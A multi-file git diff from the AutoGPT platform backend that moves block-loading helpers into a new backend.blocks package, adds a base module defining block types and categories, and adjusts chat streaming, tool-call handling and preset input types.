|
||||||
],
|
|
||||||
}
|
|
||||||
|
|
||||||
except ImportError:
|
|
||||||
logger.debug("[Tracing] SDK not available for hook-based tracing")
|
|
||||||
return {}
|
|
||||||
|
|
||||||
|
|
||||||
def merge_hooks(*hook_dicts: dict[str, Any]) -> dict[str, Any]:
|
|
||||||
"""Merge multiple hook configurations into one.
|
|
||||||
|
|
||||||
Combines hook matchers for the same event type, allowing both
|
|
||||||
security and tracing hooks to coexist.
|
|
||||||
|
|
||||||
Usage:
|
|
||||||
combined = merge_hooks(security_hooks, tracing_hooks)
|
|
||||||
"""
|
|
||||||
result: dict[str, list[Any]] = {}
|
|
||||||
for hook_dict in hook_dicts:
|
|
||||||
for event_name, matchers in hook_dict.items():
|
|
||||||
if event_name not in result:
|
|
||||||
result[event_name] = []
|
|
||||||
result[event_name].extend(matchers)
|
|
||||||
return result
|
|
||||||
@@ -245,16 +245,12 @@ async def _get_system_prompt_template(context: str) -> str:
|
|||||||
return DEFAULT_SYSTEM_PROMPT.format(users_information=context)
|
return DEFAULT_SYSTEM_PROMPT.format(users_information=context)
|
||||||
|
|
||||||
|
|
||||||
async def _build_system_prompt(
|
async def _build_system_prompt(user_id: str | None) -> tuple[str, Any]:
|
||||||
user_id: str | None, has_conversation_history: bool = False
|
|
||||||
) -> tuple[str, Any]:
|
|
||||||
"""Build the full system prompt including business understanding if available.
|
"""Build the full system prompt including business understanding if available.
|
||||||
|
|
||||||
Args:
|
Args:
|
||||||
user_id: The user ID for fetching business understanding.
|
user_id: The user ID for fetching business understanding
|
||||||
has_conversation_history: Whether there's existing conversation history.
|
If "default" and this is the user's first session, will use "onboarding" instead.
|
||||||
If True, we don't tell the model to greet/introduce (since they're
|
|
||||||
already in a conversation).
|
|
||||||
|
|
||||||
Returns:
|
Returns:
|
||||||
Tuple of (compiled prompt string, business understanding object)
|
Tuple of (compiled prompt string, business understanding object)
|
||||||
@@ -270,8 +266,6 @@ async def _build_system_prompt(
|
|||||||
|
|
||||||
if understanding:
|
if understanding:
|
||||||
context = format_understanding_for_prompt(understanding)
|
context = format_understanding_for_prompt(understanding)
|
||||||
elif has_conversation_history:
|
|
||||||
context = "No prior understanding saved yet. Continue the existing conversation naturally."
|
|
||||||
else:
|
else:
|
||||||
context = "This is the first time you are meeting the user. Greet them and introduce them to the platform"
|
context = "This is the first time you are meeting the user. Greet them and introduce them to the platform"
|
||||||
|
|
||||||
@@ -380,6 +374,7 @@ async def stream_chat_completion(
|
|||||||
|
|
||||||
Raises:
|
Raises:
|
||||||
NotFoundError: If session_id is invalid
|
NotFoundError: If session_id is invalid
|
||||||
|
ValueError: If max_context_messages is exceeded
|
||||||
|
|
||||||
"""
|
"""
|
||||||
completion_start = time.monotonic()
|
completion_start = time.monotonic()
|
||||||
@@ -464,9 +459,8 @@ async def stream_chat_completion(
|
|||||||
|
|
||||||
# Generate title for new sessions on first user message (non-blocking)
|
# Generate title for new sessions on first user message (non-blocking)
|
||||||
# Check: is_user_message, no title yet, and this is the first user message
|
# Check: is_user_message, no title yet, and this is the first user message
|
||||||
user_messages = [m for m in session.messages if m.role == "user"]
|
if is_user_message and message and not session.title:
|
||||||
first_user_msg = message or (user_messages[0].content if user_messages else None)
|
user_messages = [m for m in session.messages if m.role == "user"]
|
||||||
if is_user_message and first_user_msg and not session.title:
|
|
||||||
if len(user_messages) == 1:
|
if len(user_messages) == 1:
|
||||||
# First user message - generate title in background
|
# First user message - generate title in background
|
||||||
import asyncio
|
import asyncio
|
||||||
@@ -474,7 +468,7 @@ async def stream_chat_completion(
|
|||||||
# Capture only the values we need (not the session object) to avoid
|
# Capture only the values we need (not the session object) to avoid
|
||||||
# stale data issues when the main flow modifies the session
|
# stale data issues when the main flow modifies the session
|
||||||
captured_session_id = session_id
|
captured_session_id = session_id
|
||||||
captured_message = first_user_msg
|
captured_message = message
|
||||||
captured_user_id = user_id
|
captured_user_id = user_id
|
||||||
|
|
||||||
async def _update_title():
|
async def _update_title():
|
||||||
@@ -806,9 +800,13 @@ async def stream_chat_completion(
|
|||||||
# Build the messages list in the correct order
|
# Build the messages list in the correct order
|
||||||
messages_to_save: list[ChatMessage] = []
|
messages_to_save: list[ChatMessage] = []
|
||||||
|
|
||||||
# Add assistant message with tool_calls if any
|
# Add assistant message with tool_calls if any.
|
||||||
|
# Use extend (not assign) to preserve tool_calls already added by
|
||||||
|
# _yield_tool_call for long-running tools.
|
||||||
if accumulated_tool_calls:
|
if accumulated_tool_calls:
|
||||||
assistant_response.tool_calls = accumulated_tool_calls
|
if not assistant_response.tool_calls:
|
||||||
|
assistant_response.tool_calls = []
|
||||||
|
assistant_response.tool_calls.extend(accumulated_tool_calls)
|
||||||
logger.info(
|
logger.info(
|
||||||
f"Added {len(accumulated_tool_calls)} tool calls to assistant message"
|
f"Added {len(accumulated_tool_calls)} tool calls to assistant message"
|
||||||
)
|
)
|
||||||
@@ -1239,7 +1237,7 @@ async def _stream_chat_chunks(
|
|||||||
|
|
||||||
total_time = (time_module.perf_counter() - stream_chunks_start) * 1000
|
total_time = (time_module.perf_counter() - stream_chunks_start) * 1000
|
||||||
logger.info(
|
logger.info(
|
||||||
f"[TIMING] _stream_chat_chunks COMPLETED in {total_time / 1000:.1f}s; "
|
f"[TIMING] _stream_chat_chunks COMPLETED in {total_time/1000:.1f}s; "
|
||||||
f"session={session.session_id}, user={session.user_id}",
|
f"session={session.session_id}, user={session.user_id}",
|
||||||
extra={"json_fields": {**log_meta, "total_time_ms": total_time}},
|
extra={"json_fields": {**log_meta, "total_time_ms": total_time}},
|
||||||
)
|
)
|
||||||
@@ -1410,13 +1408,9 @@ async def _yield_tool_call(
|
|||||||
operation_id=operation_id,
|
operation_id=operation_id,
|
||||||
)
|
)
|
||||||
|
|
||||||
# Save assistant message with tool_call FIRST (required by LLM)
|
# Attach the tool_call to the current turn's assistant message
|
||||||
assistant_message = ChatMessage(
|
# (or create one if this is a tool-only response with no text).
|
||||||
role="assistant",
|
session.add_tool_call_to_current_turn(tool_calls[yield_idx])
|
||||||
content="",
|
|
||||||
tool_calls=[tool_calls[yield_idx]],
|
|
||||||
)
|
|
||||||
session.messages.append(assistant_message)
|
|
||||||
|
|
||||||
# Then save pending tool result
|
# Then save pending tool result
|
||||||
pending_message = ChatMessage(
|
pending_message = ChatMessage(
|
||||||
|
|||||||
@@ -814,28 +814,6 @@ async def get_active_task_for_session(
|
|||||||
if task_user_id and user_id != task_user_id:
|
if task_user_id and user_id != task_user_id:
|
||||||
continue
|
continue
|
||||||
|
|
||||||
# Auto-expire stale tasks that exceeded stream_timeout
|
|
||||||
created_at_str = meta.get("created_at", "")
|
|
||||||
if created_at_str:
|
|
||||||
try:
|
|
||||||
created_at = datetime.fromisoformat(created_at_str)
|
|
||||||
age_seconds = (
|
|
||||||
datetime.now(timezone.utc) - created_at
|
|
||||||
).total_seconds()
|
|
||||||
if age_seconds > config.stream_timeout:
|
|
||||||
logger.warning(
|
|
||||||
f"[TASK_LOOKUP] Auto-expiring stale task {task_id[:8]}... "
|
|
||||||
f"(age={age_seconds:.0f}s > timeout={config.stream_timeout}s)"
|
|
||||||
)
|
|
||||||
await mark_task_completed(task_id, "failed")
|
|
||||||
continue
|
|
||||||
except (ValueError, TypeError):
|
|
||||||
pass
|
|
||||||
|
|
||||||
logger.info(
|
|
||||||
f"[TASK_LOOKUP] Found running task {task_id[:8]}... for session {session_id[:8]}..."
|
|
||||||
)
|
|
||||||
|
|
||||||
# Get the last message ID from Redis Stream
|
# Get the last message ID from Redis Stream
|
||||||
stream_key = _get_task_stream_key(task_id)
|
stream_key = _get_task_stream_key(task_id)
|
||||||
last_id = "0-0"
|
last_id = "0-0"
|
||||||
|
|||||||
@@ -13,7 +13,8 @@ from backend.api.features.chat.tools.models import (
|
|||||||
NoResultsResponse,
|
NoResultsResponse,
|
||||||
)
|
)
|
||||||
from backend.api.features.store.hybrid_search import unified_hybrid_search
|
from backend.api.features.store.hybrid_search import unified_hybrid_search
|
||||||
from backend.data.block import BlockType, get_block
|
from backend.blocks import get_block
|
||||||
|
from backend.blocks._base import BlockType
|
||||||
|
|
||||||
logger = logging.getLogger(__name__)
|
logger = logging.getLogger(__name__)
|
||||||
|
|
||||||
|
|||||||
@@ -10,7 +10,7 @@ from backend.api.features.chat.tools.find_block import (
|
|||||||
FindBlockTool,
|
FindBlockTool,
|
||||||
)
|
)
|
||||||
from backend.api.features.chat.tools.models import BlockListResponse
|
from backend.api.features.chat.tools.models import BlockListResponse
|
||||||
from backend.data.block import BlockType
|
from backend.blocks._base import BlockType
|
||||||
|
|
||||||
from ._test_data import make_session
|
from ._test_data import make_session
|
||||||
|
|
||||||
|
|||||||
@@ -335,17 +335,11 @@ class BlockInfoSummary(BaseModel):
|
|||||||
name: str
|
name: str
|
||||||
description: str
|
description: str
|
||||||
categories: list[str]
|
categories: list[str]
|
||||||
input_schema: dict[str, Any] = Field(
|
input_schema: dict[str, Any]
|
||||||
default_factory=dict,
|
output_schema: dict[str, Any]
|
||||||
description="Full JSON schema for block inputs",
|
|
||||||
)
|
|
||||||
output_schema: dict[str, Any] = Field(
|
|
||||||
default_factory=dict,
|
|
||||||
description="Full JSON schema for block outputs",
|
|
||||||
)
|
|
||||||
required_inputs: list[BlockInputFieldInfo] = Field(
|
required_inputs: list[BlockInputFieldInfo] = Field(
|
||||||
default_factory=list,
|
default_factory=list,
|
||||||
description="List of input fields for this block",
|
description="List of required input fields for this block",
|
||||||
)
|
)
|
||||||
|
|
||||||
|
|
||||||
@@ -358,7 +352,7 @@ class BlockListResponse(ToolResponseBase):
|
|||||||
query: str
|
query: str
|
||||||
usage_hint: str = Field(
|
usage_hint: str = Field(
|
||||||
default="To execute a block, call run_block with block_id set to the block's "
|
default="To execute a block, call run_block with block_id set to the block's "
|
||||||
"'id' field and input_data containing the fields listed in required_inputs."
|
"'id' field and input_data containing the required fields from input_schema."
|
||||||
)
|
)
|
||||||
|
|
||||||
|
|
||||||
|
|||||||
@@ -12,7 +12,8 @@ from backend.api.features.chat.tools.find_block import (
|
|||||||
COPILOT_EXCLUDED_BLOCK_IDS,
|
COPILOT_EXCLUDED_BLOCK_IDS,
|
||||||
COPILOT_EXCLUDED_BLOCK_TYPES,
|
COPILOT_EXCLUDED_BLOCK_TYPES,
|
||||||
)
|
)
|
||||||
from backend.data.block import AnyBlockSchema, get_block
|
from backend.blocks import get_block
|
||||||
|
from backend.blocks._base import AnyBlockSchema
|
||||||
from backend.data.execution import ExecutionContext
|
from backend.data.execution import ExecutionContext
|
||||||
from backend.data.model import CredentialsFieldInfo, CredentialsMetaInput
|
from backend.data.model import CredentialsFieldInfo, CredentialsMetaInput
|
||||||
from backend.data.workspace import get_or_create_workspace
|
from backend.data.workspace import get_or_create_workspace
|
||||||
|
|||||||
@@ -6,7 +6,7 @@ import pytest
|
|||||||
|
|
||||||
from backend.api.features.chat.tools.models import ErrorResponse
|
from backend.api.features.chat.tools.models import ErrorResponse
|
||||||
from backend.api.features.chat.tools.run_block import RunBlockTool
|
from backend.api.features.chat.tools.run_block import RunBlockTool
|
||||||
from backend.data.block import BlockType
|
from backend.blocks._base import BlockType
|
||||||
|
|
||||||
from ._test_data import make_session
|
from ._test_data import make_session
|
||||||
|
|
||||||
|
|||||||
@@ -12,12 +12,11 @@ import backend.api.features.store.image_gen as store_image_gen
|
|||||||
import backend.api.features.store.media as store_media
|
import backend.api.features.store.media as store_media
|
||||||
import backend.data.graph as graph_db
|
import backend.data.graph as graph_db
|
||||||
import backend.data.integrations as integrations_db
|
import backend.data.integrations as integrations_db
|
||||||
from backend.data.block import BlockInput
|
|
||||||
from backend.data.db import transaction
|
from backend.data.db import transaction
|
||||||
from backend.data.execution import get_graph_execution
|
from backend.data.execution import get_graph_execution
|
||||||
from backend.data.graph import GraphSettings
|
from backend.data.graph import GraphSettings
|
||||||
from backend.data.includes import AGENT_PRESET_INCLUDE, library_agent_include
|
from backend.data.includes import AGENT_PRESET_INCLUDE, library_agent_include
|
||||||
from backend.data.model import CredentialsMetaInput
|
from backend.data.model import CredentialsMetaInput, GraphInput
|
||||||
from backend.integrations.creds_manager import IntegrationCredentialsManager
|
from backend.integrations.creds_manager import IntegrationCredentialsManager
|
||||||
from backend.integrations.webhooks.graph_lifecycle_hooks import (
|
from backend.integrations.webhooks.graph_lifecycle_hooks import (
|
||||||
on_graph_activate,
|
on_graph_activate,
|
||||||
@@ -1130,7 +1129,7 @@ async def create_preset_from_graph_execution(
|
|||||||
async def update_preset(
|
async def update_preset(
|
||||||
user_id: str,
|
user_id: str,
|
||||||
preset_id: str,
|
preset_id: str,
|
||||||
inputs: Optional[BlockInput] = None,
|
inputs: Optional[GraphInput] = None,
|
||||||
credentials: Optional[dict[str, CredentialsMetaInput]] = None,
|
credentials: Optional[dict[str, CredentialsMetaInput]] = None,
|
||||||
name: Optional[str] = None,
|
name: Optional[str] = None,
|
||||||
description: Optional[str] = None,
|
description: Optional[str] = None,
|
||||||
|
|||||||
@@ -6,9 +6,12 @@ import prisma.enums
|
|||||||
import prisma.models
|
import prisma.models
|
||||||
import pydantic
|
import pydantic
|
||||||
|
|
||||||
from backend.data.block import BlockInput
|
|
||||||
from backend.data.graph import GraphModel, GraphSettings, GraphTriggerInfo
|
from backend.data.graph import GraphModel, GraphSettings, GraphTriggerInfo
|
||||||
from backend.data.model import CredentialsMetaInput, is_credentials_field_name
|
from backend.data.model import (
|
||||||
|
CredentialsMetaInput,
|
||||||
|
GraphInput,
|
||||||
|
is_credentials_field_name,
|
||||||
|
)
|
||||||
from backend.util.json import loads as json_loads
|
from backend.util.json import loads as json_loads
|
||||||
from backend.util.models import Pagination
|
from backend.util.models import Pagination
|
||||||
|
|
||||||
@@ -323,7 +326,7 @@ class LibraryAgentPresetCreatable(pydantic.BaseModel):
|
|||||||
graph_id: str
|
graph_id: str
|
||||||
graph_version: int
|
graph_version: int
|
||||||
|
|
||||||
inputs: BlockInput
|
inputs: GraphInput
|
||||||
credentials: dict[str, CredentialsMetaInput]
|
credentials: dict[str, CredentialsMetaInput]
|
||||||
|
|
||||||
name: str
|
name: str
|
||||||
@@ -352,7 +355,7 @@ class LibraryAgentPresetUpdatable(pydantic.BaseModel):
|
|||||||
Request model used when updating a preset for a library agent.
|
Request model used when updating a preset for a library agent.
|
||||||
"""
|
"""
|
||||||
|
|
||||||
inputs: Optional[BlockInput] = None
|
inputs: Optional[GraphInput] = None
|
||||||
credentials: Optional[dict[str, CredentialsMetaInput]] = None
|
credentials: Optional[dict[str, CredentialsMetaInput]] = None
|
||||||
|
|
||||||
name: Optional[str] = None
|
name: Optional[str] = None
|
||||||
@@ -395,7 +398,7 @@ class LibraryAgentPreset(LibraryAgentPresetCreatable):
|
|||||||
"Webhook must be included in AgentPreset query when webhookId is set"
|
"Webhook must be included in AgentPreset query when webhookId is set"
|
||||||
)
|
)
|
||||||
|
|
||||||
input_data: BlockInput = {}
|
input_data: GraphInput = {}
|
||||||
input_credentials: dict[str, CredentialsMetaInput] = {}
|
input_credentials: dict[str, CredentialsMetaInput] = {}
|
||||||
|
|
||||||
for preset_input in preset.InputPresets:
|
for preset_input in preset.InputPresets:
|
||||||
|
|||||||
@@ -5,8 +5,8 @@ from typing import Optional
|
|||||||
import aiohttp
|
import aiohttp
|
||||||
from fastapi import HTTPException
|
from fastapi import HTTPException
|
||||||
|
|
||||||
|
from backend.blocks import get_block
|
||||||
from backend.data import graph as graph_db
|
from backend.data import graph as graph_db
|
||||||
from backend.data.block import get_block
|
|
||||||
from backend.util.settings import Settings
|
from backend.util.settings import Settings
|
||||||
|
|
||||||
from .models import ApiResponse, ChatRequest, GraphData
|
from .models import ApiResponse, ChatRequest, GraphData
|
||||||
|
|||||||
@@ -152,7 +152,7 @@ class BlockHandler(ContentHandler):
|
|||||||
|
|
||||||
async def get_missing_items(self, batch_size: int) -> list[ContentItem]:
|
async def get_missing_items(self, batch_size: int) -> list[ContentItem]:
|
||||||
"""Fetch blocks without embeddings."""
|
"""Fetch blocks without embeddings."""
|
||||||
from backend.data.block import get_blocks
|
from backend.blocks import get_blocks
|
||||||
|
|
||||||
# Get all available blocks
|
# Get all available blocks
|
||||||
all_blocks = get_blocks()
|
all_blocks = get_blocks()
|
||||||
@@ -249,7 +249,7 @@ class BlockHandler(ContentHandler):
|
|||||||
|
|
||||||
async def get_stats(self) -> dict[str, int]:
|
async def get_stats(self) -> dict[str, int]:
|
||||||
"""Get statistics about block embedding coverage."""
|
"""Get statistics about block embedding coverage."""
|
||||||
from backend.data.block import get_blocks
|
from backend.blocks import get_blocks
|
||||||
|
|
||||||
all_blocks = get_blocks()
|
all_blocks = get_blocks()
|
||||||
|
|
||||||
|
|||||||
@@ -93,7 +93,7 @@ async def test_block_handler_get_missing_items(mocker):
|
|||||||
mock_existing = []
|
mock_existing = []
|
||||||
|
|
||||||
with patch(
|
with patch(
|
||||||
"backend.data.block.get_blocks",
|
"backend.blocks.get_blocks",
|
||||||
return_value=mock_blocks,
|
return_value=mock_blocks,
|
||||||
):
|
):
|
||||||
with patch(
|
with patch(
|
||||||
@@ -135,7 +135,7 @@ async def test_block_handler_get_stats(mocker):
|
|||||||
mock_embedded = [{"count": 2}]
|
mock_embedded = [{"count": 2}]
|
||||||
|
|
||||||
with patch(
|
with patch(
|
||||||
"backend.data.block.get_blocks",
|
"backend.blocks.get_blocks",
|
||||||
return_value=mock_blocks,
|
return_value=mock_blocks,
|
||||||
):
|
):
|
||||||
with patch(
|
with patch(
|
||||||
@@ -327,7 +327,7 @@ async def test_block_handler_handles_missing_attributes():
|
|||||||
mock_blocks = {"block-minimal": mock_block_class}
|
mock_blocks = {"block-minimal": mock_block_class}
|
||||||
|
|
||||||
with patch(
|
with patch(
|
||||||
"backend.data.block.get_blocks",
|
"backend.blocks.get_blocks",
|
||||||
return_value=mock_blocks,
|
return_value=mock_blocks,
|
||||||
):
|
):
|
||||||
with patch(
|
with patch(
|
||||||
@@ -360,7 +360,7 @@ async def test_block_handler_skips_failed_blocks():
|
|||||||
mock_blocks = {"good-block": good_block, "bad-block": bad_block}
|
mock_blocks = {"good-block": good_block, "bad-block": bad_block}
|
||||||
|
|
||||||
with patch(
|
with patch(
|
||||||
"backend.data.block.get_blocks",
|
"backend.blocks.get_blocks",
|
||||||
return_value=mock_blocks,
|
return_value=mock_blocks,
|
||||||
):
|
):
|
||||||
with patch(
|
with patch(
|
||||||
|
|||||||
@@ -662,7 +662,7 @@ async def cleanup_orphaned_embeddings() -> dict[str, Any]:
|
|||||||
)
|
)
|
||||||
current_ids = {row["id"] for row in valid_agents}
|
current_ids = {row["id"] for row in valid_agents}
|
||||||
elif content_type == ContentType.BLOCK:
|
elif content_type == ContentType.BLOCK:
|
||||||
from backend.data.block import get_blocks
|
from backend.blocks import get_blocks
|
||||||
|
|
||||||
current_ids = set(get_blocks().keys())
|
current_ids = set(get_blocks().keys())
|
||||||
elif content_type == ContentType.DOCUMENTATION:
|
elif content_type == ContentType.DOCUMENTATION:
|
||||||
|
|||||||
@@ -7,15 +7,6 @@ from replicate.client import Client as ReplicateClient
|
|||||||
from replicate.exceptions import ReplicateError
|
from replicate.exceptions import ReplicateError
|
||||||
from replicate.helpers import FileOutput
|
from replicate.helpers import FileOutput
|
||||||
|
|
||||||
from backend.blocks.ideogram import (
|
|
||||||
AspectRatio,
|
|
||||||
ColorPalettePreset,
|
|
||||||
IdeogramModelBlock,
|
|
||||||
IdeogramModelName,
|
|
||||||
MagicPromptOption,
|
|
||||||
StyleType,
|
|
||||||
UpscaleOption,
|
|
||||||
)
|
|
||||||
from backend.data.graph import GraphBaseMeta
|
from backend.data.graph import GraphBaseMeta
|
||||||
from backend.data.model import CredentialsMetaInput, ProviderName
|
from backend.data.model import CredentialsMetaInput, ProviderName
|
||||||
from backend.integrations.credentials_store import ideogram_credentials
|
from backend.integrations.credentials_store import ideogram_credentials
|
||||||
@@ -50,6 +41,16 @@ async def generate_agent_image_v2(graph: GraphBaseMeta | AgentGraph) -> io.Bytes
|
|||||||
if not ideogram_credentials.api_key:
|
if not ideogram_credentials.api_key:
|
||||||
raise ValueError("Missing Ideogram API key")
|
raise ValueError("Missing Ideogram API key")
|
||||||
|
|
||||||
|
from backend.blocks.ideogram import (
|
||||||
|
AspectRatio,
|
||||||
|
ColorPalettePreset,
|
||||||
|
IdeogramModelBlock,
|
||||||
|
IdeogramModelName,
|
||||||
|
MagicPromptOption,
|
||||||
|
StyleType,
|
||||||
|
UpscaleOption,
|
||||||
|
)
|
||||||
|
|
||||||
name = graph.name
|
name = graph.name
|
||||||
description = f"{name} ({graph.description})" if graph.description else name
|
description = f"{name} ({graph.description})" if graph.description else name
|
||||||
|
|
||||||
|
|||||||
@@ -40,10 +40,11 @@ from backend.api.model import (
|
|||||||
UpdateTimezoneRequest,
|
UpdateTimezoneRequest,
|
||||||
UploadFileResponse,
|
UploadFileResponse,
|
||||||
)
|
)
|
||||||
|
from backend.blocks import get_block, get_blocks
|
||||||
from backend.data import execution as execution_db
|
from backend.data import execution as execution_db
|
||||||
from backend.data import graph as graph_db
|
from backend.data import graph as graph_db
|
||||||
from backend.data.auth import api_key as api_key_db
|
from backend.data.auth import api_key as api_key_db
|
||||||
from backend.data.block import BlockInput, CompletedBlockOutput, get_block, get_blocks
|
from backend.data.block import BlockInput, CompletedBlockOutput
|
||||||
from backend.data.credit import (
|
from backend.data.credit import (
|
||||||
AutoTopUpConfig,
|
AutoTopUpConfig,
|
||||||
RefundRequest,
|
RefundRequest,
|
||||||
|
|||||||
@@ -3,22 +3,19 @@ import logging
|
|||||||
import os
|
import os
|
||||||
import re
|
import re
|
||||||
from pathlib import Path
|
from pathlib import Path
|
||||||
from typing import TYPE_CHECKING, TypeVar
|
from typing import Sequence, Type, TypeVar
|
||||||
|
|
||||||
|
from backend.blocks._base import AnyBlockSchema, BlockType
|
||||||
from backend.util.cache import cached
|
from backend.util.cache import cached
|
||||||
|
|
||||||
logger = logging.getLogger(__name__)
|
logger = logging.getLogger(__name__)
|
||||||
|
|
||||||
|
|
||||||
if TYPE_CHECKING:
|
|
||||||
from backend.data.block import Block
|
|
||||||
|
|
||||||
T = TypeVar("T")
|
T = TypeVar("T")
|
||||||
|
|
||||||
|
|
||||||
@cached(ttl_seconds=3600)
|
@cached(ttl_seconds=3600)
|
||||||
def load_all_blocks() -> dict[str, type["Block"]]:
|
def load_all_blocks() -> dict[str, type["AnyBlockSchema"]]:
|
||||||
from backend.data.block import Block
|
from backend.blocks._base import Block
|
||||||
from backend.util.settings import Config
|
from backend.util.settings import Config
|
||||||
|
|
||||||
# Check if example blocks should be loaded from settings
|
# Check if example blocks should be loaded from settings
|
||||||
@@ -50,8 +47,8 @@ def load_all_blocks() -> dict[str, type["Block"]]:
|
|||||||
importlib.import_module(f".{module}", package=__name__)
|
importlib.import_module(f".{module}", package=__name__)
|
||||||
|
|
||||||
# Load all Block instances from the available modules
|
# Load all Block instances from the available modules
|
||||||
available_blocks: dict[str, type["Block"]] = {}
|
available_blocks: dict[str, type["AnyBlockSchema"]] = {}
|
||||||
for block_cls in all_subclasses(Block):
|
for block_cls in _all_subclasses(Block):
|
||||||
class_name = block_cls.__name__
|
class_name = block_cls.__name__
|
||||||
|
|
||||||
if class_name.endswith("Base"):
|
if class_name.endswith("Base"):
|
||||||
@@ -64,7 +61,7 @@ def load_all_blocks() -> dict[str, type["Block"]]:
|
|||||||
"please name the class with 'Base' at the end"
|
"please name the class with 'Base' at the end"
|
||||||
)
|
)
|
||||||
|
|
||||||
block = block_cls.create()
|
block = block_cls() # pyright: ignore[reportAbstractUsage]
|
||||||
|
|
||||||
if not isinstance(block.id, str) or len(block.id) != 36:
|
if not isinstance(block.id, str) or len(block.id) != 36:
|
||||||
raise ValueError(
|
raise ValueError(
|
||||||
@@ -105,7 +102,7 @@ def load_all_blocks() -> dict[str, type["Block"]]:
|
|||||||
available_blocks[block.id] = block_cls
|
available_blocks[block.id] = block_cls
|
||||||
|
|
||||||
# Filter out blocks with incomplete auth configs, e.g. missing OAuth server secrets
|
# Filter out blocks with incomplete auth configs, e.g. missing OAuth server secrets
|
||||||
from backend.data.block import is_block_auth_configured
|
from ._utils import is_block_auth_configured
|
||||||
|
|
||||||
filtered_blocks = {}
|
filtered_blocks = {}
|
||||||
for block_id, block_cls in available_blocks.items():
|
for block_id, block_cls in available_blocks.items():
|
||||||
@@ -115,11 +112,48 @@ def load_all_blocks() -> dict[str, type["Block"]]:
|
|||||||
return filtered_blocks
|
return filtered_blocks
|
||||||
|
|
||||||
|
|
||||||
__all__ = ["load_all_blocks"]
|
def _all_subclasses(cls: type[T]) -> list[type[T]]:
|
||||||
|
|
||||||
|
|
||||||
def all_subclasses(cls: type[T]) -> list[type[T]]:
|
|
||||||
subclasses = cls.__subclasses__()
|
subclasses = cls.__subclasses__()
|
||||||
for subclass in subclasses:
|
for subclass in subclasses:
|
||||||
subclasses += all_subclasses(subclass)
|
subclasses += _all_subclasses(subclass)
|
||||||
return subclasses
|
return subclasses
|
||||||
|
|
||||||
|
|
||||||
|
# ============== Block access helper functions ============== #
|
||||||
|
|
||||||
|
|
||||||
|
def get_blocks() -> dict[str, Type["AnyBlockSchema"]]:
|
||||||
|
return load_all_blocks()
|
||||||
|
|
||||||
|
|
||||||
|
# Note on the return type annotation: https://github.com/microsoft/pyright/issues/10281
|
||||||
|
def get_block(block_id: str) -> "AnyBlockSchema | None":
|
||||||
|
cls = get_blocks().get(block_id)
|
||||||
|
return cls() if cls else None
|
||||||
|
|
||||||
|
|
||||||
|
@cached(ttl_seconds=3600)
|
||||||
|
def get_webhook_block_ids() -> Sequence[str]:
|
||||||
|
return [
|
||||||
|
id
|
||||||
|
for id, B in get_blocks().items()
|
||||||
|
if B().block_type in (BlockType.WEBHOOK, BlockType.WEBHOOK_MANUAL)
|
||||||
|
]
|
||||||
|
|
||||||
|
|
||||||
|
@cached(ttl_seconds=3600)
|
||||||
|
def get_io_block_ids() -> Sequence[str]:
|
||||||
|
return [
|
||||||
|
id
|
||||||
|
for id, B in get_blocks().items()
|
||||||
|
if B().block_type in (BlockType.INPUT, BlockType.OUTPUT)
|
||||||
|
]
|
||||||
|
|
||||||
|
|
||||||
|
@cached(ttl_seconds=3600)
|
||||||
|
def get_human_in_the_loop_block_ids() -> Sequence[str]:
|
||||||
|
return [
|
||||||
|
id
|
||||||
|
for id, B in get_blocks().items()
|
||||||
|
if B().block_type == BlockType.HUMAN_IN_THE_LOOP
|
||||||
|
]
|
||||||
|
|||||||
739
autogpt_platform/backend/backend/blocks/_base.py
Normal file
739
autogpt_platform/backend/backend/blocks/_base.py
Normal file
@@ -0,0 +1,739 @@
|
|||||||
|
import inspect
|
||||||
|
import logging
|
||||||
|
from abc import ABC, abstractmethod
|
||||||
|
from enum import Enum
|
||||||
|
from typing import (
|
||||||
|
TYPE_CHECKING,
|
||||||
|
Any,
|
||||||
|
Callable,
|
||||||
|
ClassVar,
|
||||||
|
Generic,
|
||||||
|
Optional,
|
||||||
|
Type,
|
||||||
|
TypeAlias,
|
||||||
|
TypeVar,
|
||||||
|
cast,
|
||||||
|
get_origin,
|
||||||
|
)
|
||||||
|
|
||||||
|
import jsonref
|
||||||
|
import jsonschema
|
||||||
|
from pydantic import BaseModel
|
||||||
|
|
||||||
|
from backend.data.block import BlockInput, BlockOutput, BlockOutputEntry
|
||||||
|
from backend.data.model import (
|
||||||
|
Credentials,
|
||||||
|
CredentialsFieldInfo,
|
||||||
|
CredentialsMetaInput,
|
||||||
|
SchemaField,
|
||||||
|
is_credentials_field_name,
|
||||||
|
)
|
||||||
|
from backend.integrations.providers import ProviderName
|
||||||
|
from backend.util import json
|
||||||
|
from backend.util.exceptions import (
|
||||||
|
BlockError,
|
||||||
|
BlockExecutionError,
|
||||||
|
BlockInputError,
|
||||||
|
BlockOutputError,
|
||||||
|
BlockUnknownError,
|
||||||
|
)
|
||||||
|
from backend.util.settings import Config
|
||||||
|
|
||||||
|
logger = logging.getLogger(__name__)
|
||||||
|
|
||||||
|
if TYPE_CHECKING:
|
||||||
|
from backend.data.execution import ExecutionContext
|
||||||
|
from backend.data.model import ContributorDetails, NodeExecutionStats
|
||||||
|
|
||||||
|
from ..data.graph import Link
|
||||||
|
|
||||||
|
app_config = Config()
|
||||||
|
|
||||||
|
|
||||||
|
BlockTestOutput = BlockOutputEntry | tuple[str, Callable[[Any], bool]]
|
||||||
|
|
||||||
|
|
||||||
|
class BlockType(Enum):
|
||||||
|
STANDARD = "Standard"
|
||||||
|
INPUT = "Input"
|
||||||
|
OUTPUT = "Output"
|
||||||
|
NOTE = "Note"
|
||||||
|
WEBHOOK = "Webhook"
|
||||||
|
WEBHOOK_MANUAL = "Webhook (manual)"
|
||||||
|
AGENT = "Agent"
|
||||||
|
AI = "AI"
|
||||||
|
AYRSHARE = "Ayrshare"
|
||||||
|
HUMAN_IN_THE_LOOP = "Human In The Loop"
|
||||||
|
|
||||||
|
|
||||||
|
class BlockCategory(Enum):
|
||||||
|
AI = "Block that leverages AI to perform a task."
|
||||||
|
SOCIAL = "Block that interacts with social media platforms."
|
||||||
|
TEXT = "Block that processes text data."
|
||||||
|
SEARCH = "Block that searches or extracts information from the internet."
|
||||||
|
BASIC = "Block that performs basic operations."
|
||||||
|
INPUT = "Block that interacts with input of the graph."
|
||||||
|
OUTPUT = "Block that interacts with output of the graph."
|
||||||
|
LOGIC = "Programming logic to control the flow of your agent"
|
||||||
|
COMMUNICATION = "Block that interacts with communication platforms."
|
||||||
|
DEVELOPER_TOOLS = "Developer tools such as GitHub blocks."
|
||||||
|
DATA = "Block that interacts with structured data."
|
||||||
|
HARDWARE = "Block that interacts with hardware."
|
